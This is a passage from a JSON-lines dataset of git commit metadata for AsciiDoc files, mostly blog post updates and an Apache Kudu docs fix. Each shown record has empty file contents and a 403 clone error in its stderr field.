rch,mohit\/elasticsearch,vietlq\/elasticsearch,masterweb121\/elasticsearch,a2lin\/elasticsearch,JackyMai\/elasticsearch,strapdata\/elassandra-test,MaineC\/elasticsearch,mmaracic\/elasticsearch,scottsom\/elasticsearch,bawse\/elasticsearch,wbowling\/elasticsearch,dpursehouse\/elasticsearch,s1monw\/elasticsearch,iamjakob\/elasticsearch,tkssharma\/elasticsearch,onegambler\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,lzo\/elasticsearch-1,KimTaehee\/elasticsearch,pozhidaevak\/elasticsearch,awislowski\/elasticsearch,Helen-Zhao\/elasticsearch,kalimatas\/elasticsearch,Charlesdong\/elasticsearch,springning\/elasticsearch,yanjunh\/elasticsearch,drewr\/elasticsearch,jeteve\/elasticsearch,achow\/elasticsearch,glefloch\/elasticsearch,strapdata\/elassandra-test,kalburgimanjunath\/elasticsearch,slavau\/elasticsearch,knight1128\/elasticsearch,rlugojr\/elasticsearch,zhiqinghuang\/elasticsearch,StefanGor\/elasticsearch,fernandozhu\/elasticsearch,jimczi\/elasticsearch,iacdingping\/elasticsearch,hydro2k\/elasticsearch,Stacey-Gammon\/elasticsearch,YosuaMichael\/elasticsearch,pritishppai\/elasticsearch,clintongormley\/elasticsearch,markharwood\/elasticsearch,nomoa\/elasticsearch,mnylen\/elasticsearch,kalimatas\/elasticsearch,lks21c\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,MichaelLiZhou\/elasticsearch,iamjakob\/elasticsearch,markharwood\/elasticsearch,masaruh\/elasticsearch,areek\/elasticsearch,JSCooke\/elasticsearch,weipinghe\/elasticsearch,mmaracic\/elasticsearch,jbertouch\/elasticsearch,alexshadow007\/elasticsearch,18098924759\/elasticsearch,MichaelLiZhou\/elasticsearch,mmaracic\/elasticsearch,myelin\/elasticsearch,Charlesdong\/elasticsearch,brandonkearby\/elasticsearch,liweinan0423\/elasticsearch,scorpionvicky\/elasticsearch,diendt\/elasticsearch,awislowski\/elasticsearch,weipinghe\/elasticsearch,elancom\/elasticsearch,franklanganke\/elasticsearch,xuzha\/elasticsearch,nomoa\/elasticsearch,nellicus\/elasticsearch,rhoml\/elasticsearch,Stacey-Gammon\/elasticsearch,JSCooke\/elasticsearch,davidvgalbraith\/elasticsearch,mnylen\/elasticsearch,franklanganke\/elasticsearch,avikurapati\/elasticsearch,18098924759\/elasticsearch,zhiqinghuang\/elasticsearch,nellicus\/elasticsearch,apepper\/elasticsearch,kalburgimanjunath\/elasticsearch,s1monw\/elasticsearch,yongminxia\/elasticsearch,naveenhooda2000\/elasticsearch,rmuir\/elasticsearch,btiernay\/elasticsearch,polyfractal\/elasticsearch,coding0011\/elasticsearch,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,geidies\/elasticsearch,tebriel\/elasticsearch,HonzaKral\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,diendt\/elasticsearch,wuranbo\/elasticsearch,girirajsharma\/elasticsearch,jpountz\/elasticsearch,clintongormley\/elasticsearch,jprante\/elasticsearch,petabytedata\/elasticsearch,mbrukman\/elasticsearch,btiernay\/elasticsearch,iacdingping\/elasticsearch,naveenhooda2000\/elasticsearch,wangtuo\/elasticsearch,infusionsoft\/elasticsearch,truemped\/elasticsearch,petabytedata\/elasticsearch,girirajsharma\/elasticsearch,winstonewert\/elasticsearch,franklanganke\/elasticsearch,awislowski\/elasticsearch,caengcjd\/elasticsearch,ricardocerq\/elasticsearch,zhiqinghuang\/elasticsearch,schonfeld\/elasticsearch,Collaborne\/elasticsearch,ESamir\/elasticsearch,Uiho\/elasticsearch,MaineC\/elasticsearch,njlawton\/elasticsearch,hafkensite\/elasticsearch,rento19962\/elasticsearch,camilojd\/elasticsearch,gmarz\/elasticsearch,naveenhooda2000\/elasticsearch,winstonewert\/elasticsearch,ivansun1010\/elasticsearch,apepper\/elasticsearch,lmtwga\/elasticsearch,ulkas\/elasticsearch,IanvsPoplicola\/elasticsearch,ckclark\/elasticsearch,maddin2016\/elasticsearch,Ansh90\/elasticsearch,nilabhsagar\/elasticsearch,elancom\/elasticsearch,schonfeld\/elasticsearch,kalimatas\/elasticsearch,myelin\/elasticsearch,Uiho\/elasticsearch,IanvsPoplicola\/elasticsearch,andrestc\/elasticsearch,markwalkom\/elasticsearch,wuranbo\/elasticsearch,ckclark\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,AndreKR\/elasticsearch,MetSystem\/elasticsearch,Rygbee\/elasticsearch,andrestc\/elasticsearch,wbowling\/elasticsearch,cwurm\/elasticsearch,yanjunh\/elasticsearch,hydro2k\/elasticsearch,elancom\/elasticsearch,nellicus\/elasticsearch,kalburgimanjunath\/elasticsearch,Shepard1212\/elasticsearch,LeoYao\/elasticsearch,henakamaMSFT\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,ImpressTV\/elasticsearch,vietlq\/elasticsearch,henakamaMSFT\/elasticsearch,C-Bish\/elasticsearch,njlawton\/elasticsearch,bestwpw\/elasticsearch,cnfire\/elasticsearch-1,nrkkalyan\/elasticsearch,xuzha\/elasticsearch,weipinghe\/elasticsearch,scorpionvicky\/elasticsearch,sposam\/elasticsearch,martinstuga\/elasticsearch,tkssharma\/elasticsearch,drewr\/elasticsearch,lzo\/elasticsearch-1,kunallimaye\/elasticsearch,rajanm\/elasticsearch,socialrank\/elasticsearch,queirozfcom\/elasticsearch,zkidkid\/elasticsearch,jimczi\/elasticsearch,martinstuga\/elasticsearch,iamjakob\/elasticsearch,mnylen\/elasticsearch,rhoml\/elasticsearch,weipinghe\/elasticsearch,kunallimaye\/elasticsearch,Helen-Zhao\/elasticsearch,F0lha\/elasticsearch,Uiho\/elasticsearch,brandonkearby\/elasticsearch,jprante\/elasticsearch,vroyer\/elassandra,masterweb121\/elasticsearch,jchampion\/elasticsearch,wittyameta\/elasticsearch,MichaelLiZhou\/elasticsearch,Brijeshrpatel9\/elasticsearch,Uiho\/elasticsearch,pritishppai\/elasticsearch,mcku\/elasticsearch,schonfeld\/elasticsearch,nezirus\/elasticsearch,petabytedata\/elasticsearch,sneivandt\/elasticsearch,mortonsykes\/elasticsearch,jimczi\/elasticsearch,cnfire\/elasticsearch-1,xingguang2013\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,liweinan0423\/elasticsearch,mortonsykes\/elasticsearch,wenpos\/elasticsearch,iamjakob\/elasticsearch,btiernay\/elasticsearch,kaneshin\/elasticsearch,bawse\/elasticsearch,djschny\/elasticsearch,umeshdangat\/elasticsearch,sposam\/elasticsearch,henakamaMSFT\/elasticsearch,rmuir\/elasticsearch,shreejay\/elasticsearch,caengcjd\/elasticsearch,drewr\/elasticsearch,diendt\/elasticsearch,AndreKR\/elasticsearch,sc0ttkclark\/elasticsearch,andrestc\/elasticsearch,mortonsykes\/elasticsearch,henakamaMSFT\/elasticsearch,strapdata\/elassandra-test,njlawton\/elasticsearch,socialrank\/elasticsearch,coding0011\/elasticsearch,beiske\/elasticsearch,pablocastro\/elasticsearch,naveenhooda2000\/elasticsearch,beiske\/elasticsearch,martinstuga\/elasticsearch,uschindler\/elasticsearch,jpountz\/elasticsearch,jango2015\/elasticsearch,nilabhsagar\/elasticsearch,wimvds\/elasticsearch,polyfractal\/elasticsearch,mm0\/elasticsearch,strapdata\/elassandra-test,strapdata\/elassandra,Charlesdong\/elasticsearch,palecur\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra5-rc,ulkas\/elasticsearch,tkssharma\/elasticsearch,Uiho\/elasticsearch,robin13\/elasticsearch,rento19962\/elasticsearch,ulkas\/elasticsearch,fred84\/elasticsearch,bestwpw\/elasticsearch,hydro2k\/elasticsearch,geidies\/elasticsearch,Helen-Zhao\/elasticsearch,strapdata\/elassandra,adrianbk\/elasticsearch,caengcjd\/elasticsearch,F0lha\/elasticsearch,MisterAndersen\/elasticsearch,bestwpw\/elasticsearch,huanzhong\/elasticsearch,Collaborne\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,bawse\/elasticsearch,camilojd\/elasticsearch,Uiho\/elasticsearch,martinstuga\/elasticsearch,cwurm\/elasticsearch,xingguang2013\/elasticsearch,gmarz\/elasticsearch,YosuaMichael\/elasticsearch,nknize\/elasticsearch,sneivandt\/elasticsearch,weipinghe\/elasticsearch,xuzha\/elasticsearch,LeoYao\/elasticsearch,springning\/elasticsearch,schonfeld\/elasticsearch,ckclark\/elasticsearch,KimTaehee\/elasticsearch,huanzhong\/elasticsearch,xuzha\/elasticsearch,kaneshin\/elasticsearch,wuranbo\/elasticsearch,markwalkom\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,LewayneNaidoo\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,springning\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,apepper\/elasticsearch,rmuir\/elasticsearch,adrianbk\/elasticsearch,jpountz\/elasticsearch,MichaelLiZhou\/elasticsearch,maddin2016\/elasticsearch,mgalushka\/elasticsearch,vietlq\/elasticsearch,springning\/elasticsearch,caengcjd\/elasticsearch,wimvds\/elasticsearch,jbertouch\/elasticsearch,shreejay\/elasticsearch,camilojd\/elasticsearch,jimczi\/elasticsearch,tahaemin\/elasticsearch,kingaj\/elasticsearch,wittyameta\/elasticsearch,Siddartha07\/elasticsearch,AndreKR\/elasticsearch,petabytedata\/elasticsearch,pablocastro\/elasticsearch,mortonsykes\/elasticsearch,andrejserafim\/elasticsearch,zkidkid\/elasticsearch,girirajsharma\/elasticsearch,qwerty4030\/elasticsearch,artnowo\/elasticsearch,ZTE-PaaS\/elasticsearch,mmaracic\/elasticsearch,infusionsoft\/elasticsearch,dongjoon-hyun\/elasticsearch,lmtwga\/elasticsearch,pablocastro\/elasticsearch,mikemccand\/elasticsearch,Rygbee\/elasticsearch,xingguang2013\/elasticsearch,jango2015\/elasticsearch,sreeramjayan\/elasticsearch,fred84\/elasticsearch,sposam\/elasticsearch,cnfire\/elasticsearch-1,LeoYao\/elasticsearch,polyfractal\/elasticsearch,sc0ttkclark\/elasticsearch,ZTE-PaaS\/elasticsearch,HonzaKral\/elasticsearch,schonfeld\/elasticsearch,polyfractal\/elasticsearch,pranavraman\/elasticsearch,rento19962\/elasticsearch,wangtuo\/elasticsearch,kalburgimanjunath\/elasticsearch,Brijeshrpatel9\/elasticsearch,a2lin\/elasticsearch,lks21c\/elasticsearch,beiske\/elasticsearch,strapdata\/elassandra,glefloch\/elasticsearch,djschny\/elasticsearch,dongjoon-hyun\/elasticsearch,ouyangkongtong\/elasticsearch,diendt\/elasticsearch,weipinghe\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,bestwpw\/elasticsearch,beiske\/elasticsearch,lydonchandra\/elasticsearch,Brijeshrpatel9\/elasticsearch,mgalushka\/elasticsearch,iacdingping\/elasticsearch,clintongormley\/elasticsearch,knight1128\/elasticsearch,qwerty4030\/elasticsearch,maddin2016\/elasticsearch,hafkensite\/elasticsearch,GlenRSmith\/elasticsearch,sdauletau\/elasticsearch,lydonchandra\/elasticsearch,umeshdangat\/elasticsearch,StefanGor\/elasticsearch,jeteve\/elasticsearch,Brijeshrpatel9\/elasticsearch,Shepard1212\/elasticsearch,nellicus\/elasticsearch,beiske\/elasticsearch,nazarewk\/elasticsearch,dongjoon-hyun\/elasticsearch,Collaborne\/elasticsearch,camilojd\/elasticsearch,ouyangkongtong\/elasticsearch,kalimatas\/elasticsearch,markharwood\/elasticsearch,caengcjd\/elasticsearch,yanjunh\/elasticsearch,lmtwga\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,palecur\/elasticsearch,wenpos\/elasticsearch,areek\/elasticsearch,umeshdangat\/elasticsearch,trangvh\/elasticsearch,AndreKR\/elasticsearch,areek\/elasticsearch,JackyMai\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,strapdata\/elassandra5-rc,lks21c\/elasticsearch,PhaedrusTheGreek\/elasticsearch,jimczi\/elasticsearch,AndreKR\/elasticsearch,elancom\/elasticsearch,himanshuag\/elasticsearch,MaineC\/elasticsearch,martinstuga\/elasticsearch,F0lha\/elasticsearch,scottsom\/elasticsearch,kunallimaye\/elasticsearch,18098924759\/elasticsearch,achow\/elasticsearch,vroyer\/elassandra,alexshadow007\/elasticsearch,ivansun1010\/elasticsearch,mortonsykes\/elasticsearch,apepper\/elasticsearch,vietlq\/elasticsearch,diendt\/elasticsearch,MaineC\/elasticsearch,LeoYao\/elasticsearch,fernandozhu\/elasticsearch,ricardocerq\/elasticsearch,MaineC\/elasticsearch,elasticdog\/elasticsearch,snikch\/elasticsearch,PhaedrusTheGreek\/elasticsearch,jbertouch\/elasticsearch,ESamir\/elasticsearch,jbertouch\/elasticsearch,infusionsoft\/elasticsearch,rajanm\/elasticsearch,fforbeck\/elasticsearch,bestwpw\/elasticsearch,sneivandt\/elasticsearch,elancom\/elasticsearch,Shepard1212\/elasticsearch,dpursehouse\/elasticsearch,cwurm\/elasticsearch,pablocastro\/elasticsearch,rajanm\/elasticsearch,Siddartha07\/elasticsearch,Rygbee\/elasticsearch,trangvh\/elasticsearch,adrianbk\/elasticsearch,awislowski\/elasticsearch,lzo\/elasticsearch-1,Shepard1212\/elasticsearch,masaruh\/elasticsearch,i-am-Nathan\/elasticsearch,areek\/elasticsearch,tebriel\/elasticsearch,s1monw\/elasticsearch,Siddartha07\/elasticsearch,achow\/elasticsearch,ckclark\/elasticsearch,Rygbee\/elasticsearch,LewayneNaidoo\/elasticsearch,mm0\/elasticsearch,coding0011\/elasticsearch,ricardocerq\/elasticsearch,cnfire\/elasticsearch-1,strapdata\/elassandra5-rc,kaneshin\/elasticsearch,Stacey-Gammon\/elasticsearch,adrianbk\/elasticsearch,henakamaMSFT\/elasticsearch,snikch\/elasticsearch,rmuir\/elasticsearch,karthikjaps\/elasticsearch,palecur\/elasticsearch,infusionsoft\/elasticsearch,wenpos\/elasticsearch,kunallimaye\/elasticsearch,mikemccand\/elasticsearch,bestwpw\/elasticsearch,himanshuag\/elasticsearch,martinstuga\/elasticsearch,mjason3\/elasticsearch,mgalushka\/elasticsearch,jango2015\/elasticsearch,mjason3\/elasticsearch,ulkas\/elasticsearch,iacdingping\/elasticsearch,kingaj\/elasticsearch,jeteve\/elasticsearch,infusionsoft\/elasticsearch,dpursehouse\/elasticsearch,yynil\/elasticsearch,HonzaKral\/elasticsearch,Charlesdong\/elasticsearch,snikch\/elasticsearch,nezirus\/elasticsearch,mbrukman\/elasticsearch,gingerwizard\/elasticsearch,ouyangkongtong\/elasticsearch,mcku\/elasticsearch,elancom\/elasticsearch,episerver\/elasticsearch,sreeramjayan\/elasticsearch,liweinan0423\/elasticsearch,yanjunh\/elasticsearch,vroyer\/elasticassandra,shreejay\/elasticsearch,i-am-Nathan\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nilabhsagar\/elasticsearch,pritishppai\/elasticsearch,nazarewk\/elasticsearch,xingguang2013\/elasticsearch,elasticdog\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,elancom\/elasticsearch,hafkensite\/elasticsearch,nezirus\/elasticsearch,jpountz\/elasticsearch,jpountz\/elasticsearch,ouyangkongtong\/elasticsearch,alexshadow007\/elasticsearch,18098924759\/elasticsearch,huanzhong\/elasticsearch,robin13\/elasticsearch,jeteve\/elasticsearch,YosuaMichael\/elasticsearch,episerver\/elasticsearch,geidies\/elasticsearch,gingerwizard\/elasticsearch,nrkkalyan\/elasticsearch,onegambler\/elasticsearch,areek\/elasticsearch,LewayneNaidoo\/elasticsearch,fernandozhu\/elasticsearch,geidies\/elasticsearch,mapr\/elasticsearch,wenpos\/elasticsearch,ulkas\/elasticsearch,himanshuag\/elasticsearch,yongminxia\/elasticsearch,drewr\/elasticsearch,avikurapati\/elasticsearch,drewr\/elasticsearch,petabytedata\/elasticsearch,Rygbee\/elasticsearch,fforbeck\/elasticsearch,episerver\/elasticsearch,pritishppai\/elasticsearch,IanvsPoplicola\/elasticsearch,slavau\/elasticsearch,ricardocerq\/elasticsearch,wimvds\/elasticsearch,JervyShi\/elasticsearch,gfyoung\/elasticsearch,MetSystem\/elasticsearch,MetSystem\/elasticsearch,socialrank\/elasticsearch,episerver\/elasticsearch,iacdingping\/elasticsearch,wittyameta\/elasticsearch,PhaedrusTheGreek\/elasticsearch,knight1128\/elasticsearch,mm0\/elasticsearch,petabytedata\/elasticsearch,onegambler\/elasticsearch,springning\/elasticsearch,Collaborne\/elasticsearch,KimTaehee\/elasticsearch,areek\/elasticsearch,avikurapati\/elasticsearch,trangvh\/elasticsearch,tebriel\/elasticsearch,mbrukman\/elasticsearch,Brijeshrpatel9\/elasticsearch,Siddartha07\/elasticsearch,scorpionvicky\/elasticsearch,apepper\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,lzo\/elasticsearch-1,kingaj\/elasticsearch,pranavraman\/elasticsearch,glefloch\/elasticsearch,sc0ttkclark\/elasticsearch,ImpressTV\/elasticsearch,adrianbk\/elasticsearch,sreeramjayan\/elasticsearch,djschny\/elasticsearch,nazarewk\/elasticsearch,Stacey-Gammon\/elasticsearch,clintongormley\/elasticsearch,slavau\/elasticsearch,girirajsharma\/elasticsearch,sposam\/elasticsearch,snikch\/elasticsearch,wimvds\/elasticsearch,spiegela\/elasticsearch,myelin\/elasticsearch,apepper\/elasticsearch,alexshadow007\/elasticsearch,ckclark\/elasticsearch,strapdata\/elassandra,masaruh\/elasticsearch,nellicus\/elasticsearch,jbertouch\/elasticsearch,pritishppai\/elasticsearch,YosuaMichael\/elasticsearch,slavau\/elasticsearch,nezirus\/elasticsearch,dongjoon-hyun\/elasticsearch,jchampion\/elasticsearch,a2lin\/elasticsearch,vroyer\/elassandra,bawse\/elasticsearch,qwerty4030\/elasticsearch,adrianbk\/elasticsearch,mm0\/elasticsearch,HonzaKral\/elasticsearch,yynil\/elasticsearch,rlugojr\/elasticsearch,masaruh\/elasticsearch,snikch\/elasticsearch,LewayneNaidoo\/elasticsearch,markwalkom\/elasticsearch,kunallimaye\/elasticsearch,vietlq\/elasticsearch,Ansh90\/elasticsearch,Uiho\/elasticsearch,karthikjaps\/elasticsearch,fforbeck\/elasticsearch,sdauletau\/elasticsearch,davidvgalbraith\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,truemped\/elasticsearch,jango2015\/elasticsearch,camilojd\/elasticsearch,JackyMai\/elasticsearch,yongminxia\/elasticsearch,mgalushka\/elasticsearch,Ansh90\/elasticsearch,sdauletau\/elasticsearch","old_file":"TESTING.asciidoc","new_file":"TESTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1fd5e34f98f14477f412a6a06c2ce180d962fb12","subject":"Update YYYY-mm-dd-Otro-post.adoc","message":"Update YYYY-mm-dd-Otro-post.adoc","repos":"iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io","old_file":"_posts\/YYYY-mm-dd-Otro-post.adoc","new_file":"_posts\/YYYY-mm-dd-Otro-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iesextremadura\/iesextremadura.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e34a2f4db86ebf3c3e60732091215091255d91b4","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58af0cfc645ac438c7b787d0c6b8d2549c48d8d8","subject":"Renamed '_posts\/2017-02-23-What-is-Dev-Ops-and-why-is-Dev-Ops-great-for-any-tech-team.adoc' to '_posts\/2017-02-23-What-are-Dev-Ops-SRE-and-Platform-Engineers-and-are-we-really-getting-it-right.adoc'","message":"Renamed '_posts\/2017-02-23-What-is-Dev-Ops-and-why-is-Dev-Ops-great-for-any-tech-team.adoc' to '_posts\/2017-02-23-What-are-Dev-Ops-SRE-and-Platform-Engineers-and-are-we-really-getting-it-right.adoc'","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2017-02-23-What-are-Dev-Ops-SRE-and-Platform-Engineers-and-are-we-really-getting-it-right.adoc","new_file":"_posts\/2017-02-23-What-are-Dev-Ops-SRE-and-Platform-Engineers-and-are-we-really-getting-it-right.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13906d77c74f38e6fbe7d243f7a347c0124363ab","subject":"Publish 2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","message":"Publish 2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","new_file":"2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fba9d426c0da117f2e1336a7ba85a51c6ff0af2","subject":"Update 2015-11-06-Yeah-About-that-story.adoc","message":"Update 2015-11-06-Yeah-About-that-story.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-11-06-Yeah-About-that-story.adoc","new_file":"_posts\/2015-11-06-Yeah-About-that-story.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e7f877ead0a04d989b0f5aa2768e96c4bf8bf69","subject":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","message":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fa3ca9b90f191d04e6c5ff225196ab41d834fd5","subject":"Fix the links to impala-kudu","message":"Fix the links to impala-kudu\n\nThe links are currently broken, they still point to the kimpala directory\nwhile the packages are actually available in the impala-kudu directory.\n\nThat is the link reads:\nhttp:\/\/archive.cloudera.com\/beta\/impala-kudu\/redhat\/6\/x86_64\/kimpala\/\n\nBut in our staging\/hidden repo the link is\nhttp:\/\/archive-primary.cloudera.com\/beta\/impala-kudu\/ubuntu\/trusty\/amd64\/impala-kudu\n\nChange-Id: I4cc119ff4c9af2a05435e53c5daa1f96cc35847e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1022\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@cloudera.com>\nTested-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@cloudera.com>\n","repos":"cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce8d52eb14f67c2d9e5f381cf31bba84305650ab","subject":"Update 2016-08-08-Continuous-Delivery-on-Git-Lab-with-Play-Scala-SBT-and-Heroku.adoc","message":"Update 2016-08-08-Continuous-Delivery-on-Git-Lab-with-Play-Scala-SBT-and-Heroku.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-08-08-Continuous-Delivery-on-Git-Lab-with-Play-Scala-SBT-and-Heroku.adoc","new_file":"_posts\/2016-08-08-Continuous-Delivery-on-Git-Lab-with-Play-Scala-SBT-and-Heroku.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae6dfa47201ee15285f457ce8bfb847fe834e57a","subject":"Update 2016-03-28-.adoc","message":"Update 2016-03-28-.adoc","repos":"regdog\/regdog.github.io,regdog\/regdog.github.io,regdog\/regdog.github.io","old_file":"_posts\/2016-03-28-.adoc","new_file":"_posts\/2016-03-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/regdog\/regdog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a705db2b23033643fb26147274789082a4bdf14b","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd277ddff2a6671a3ae2b737d2b39d331b73d77c","subject":"y2b create post Beats by Dr Dre Tour Unboxing (White)","message":"y2b create post Beats by Dr Dre Tour Unboxing (White)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-30-Beats-by-Dr-Dre-Tour-Unboxing-White.adoc","new_file":"_posts\/2011-12-30-Beats-by-Dr-Dre-Tour-Unboxing-White.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdc55739d86ef70c4dcd489e8eea3addac43a63a","subject":"Update 2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","message":"Update 2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","new_file":"_posts\/2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea14c79c15a9fec3c44d274d5f35aed8636aec1f","subject":"Document autoediting in doc\/autoedit.asciidoc","message":"Document autoediting in 